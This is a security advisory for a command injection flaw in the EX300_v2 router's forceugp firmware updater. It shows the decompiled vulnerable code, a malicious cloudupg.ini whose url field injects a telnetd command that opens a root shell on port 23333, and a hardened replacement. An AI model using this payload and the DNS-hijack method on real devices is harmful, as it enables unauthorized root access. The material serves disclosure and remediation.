Affected device

product: EX300_v2
version: V4.0.3c.140_B20210429

Vulnerability description

Vulnerability Type: RCE

A command injection was found in EX300_v2, V4.0.3c.140_B20210429. The update process forceugp of the router allows unauthenticated remote attackers to achieve remote code execution as root via a MitM attack.

forceugp reads the config file /var/cloudupg.ini and tries to download firmware from the address it contains. Here we can inject a command through the parameter url.

  • forceugp

```c
...
inifile_get_string("/var/cloudupg.ini", "INFO", "url", url);
inifile_get_string("/var/cloudupg.ini", "INFO", "magicid", v4);
v0 = 3;
if ( (unsigned int)strlen(url) < 0xA )
  return -1;
while ( 1 )
{
  sprintf(v2, "wget -O %s  %s", "/var/uImage.img", url); // command injection
  system(v2);
  sprintf(v2, "md5sum %s | cut -d ' ' -f1", "/var/uImage.img");
  getCmdStr(v2, v6, 33);
```
  • POST to the firmware server to check for new firmware

Since the device makes this request over plain HTTP, we can hijack the DNS request, so the repeater connects to the attacker's server instead of the legitimate one.

  • /var/cloudupg.ini

```ini
[status]
status                         = 4
netcheck                       = 0
timestamp                      = 1636514189
download                       = 2
checkend                       = 1
parameter                      = 1

[info]
version                        = hacked.hacked
magicid                        = pass
aprule                         =
time                           = 1
mode                           = 1
url                            = &telnetd -l/bin/sh -p 23333& 2>dev/null&
```
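A hardened form of the download step in forceugp, added here as an illustration and not code from this advisory or from the vendor firmware: the url value read from /var/cloudupg.ini is validated against a strict allowlist and then handed to wget as a single argv element through execlp(), so no shell ever parses it. The function names and example URLs are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Hypothetical replacement for the sprintf()+system() pattern: the
 * untrusted "url" string is never interpolated into a shell command. */

#define FW_PATH "/var/uImage.img"   /* download target, as in the decompiled code */

/* Return 1 if url is an http(s) URL made only of characters a firmware
 * URL legitimately needs, 0 otherwise. Spaces, quotes, backticks, ';',
 * '|', '<', '>', '$', '(' and ')' are all rejected. The 10-byte minimum
 * mirrors the original strlen(url) < 0xA check. */
int url_is_safe(const char *url)
{
    static const char *allowed = "-._~:/?#@%&=+,";
    size_t len = strlen(url);
    if (len < 10 || len > 1024)
        return 0;
    if (strncmp(url, "http://", 7) != 0 && strncmp(url, "https://", 8) != 0)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)url[i];
        if (!isalnum(c) && strchr(allowed, c) == NULL)
            return 0;
    }
    return 1;
}

/* Download url to FW_PATH without a shell. Returns wget's exit status,
 * or -1 if the URL fails validation or the child cannot be started. */
int download_firmware(const char *url)
{
    if (!url_is_safe(url))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* argv is passed verbatim; url is a single argument and, having
         * passed the scheme check, can never be mistaken for an option */
        execlp("wget", "wget", "-O", FW_PATH, url, (char *)NULL);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this check in place, the url value shown in the cloudupg.ini above is rejected before any process is spawned, and even a value containing '&' would only reach wget as an inert argument.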